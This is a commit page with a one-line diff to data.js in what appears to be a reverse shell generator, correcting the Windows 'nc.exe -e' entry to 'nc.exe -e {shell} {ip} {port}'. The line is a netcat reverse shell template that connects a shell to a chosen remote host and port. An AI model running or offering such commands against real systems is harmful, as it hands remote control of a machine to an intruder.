Update data.js

Fixed nc.exe
This commit is contained in:
Ryan Montgomery 2021-12-17 18:13:12 -05:00 committed by GitHub
parent 3555e4e8d2
commit 82644b5946
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -57,7 +57,7 @@ const reverseShellCommands = withCommandType(
},
{
"name": "nc.exe -e",
"command": "nc -e {shell} {ip} {port}",
"command": "nc.exe -e {shell} {ip} {port}",
"meta": ["windows"]
},
{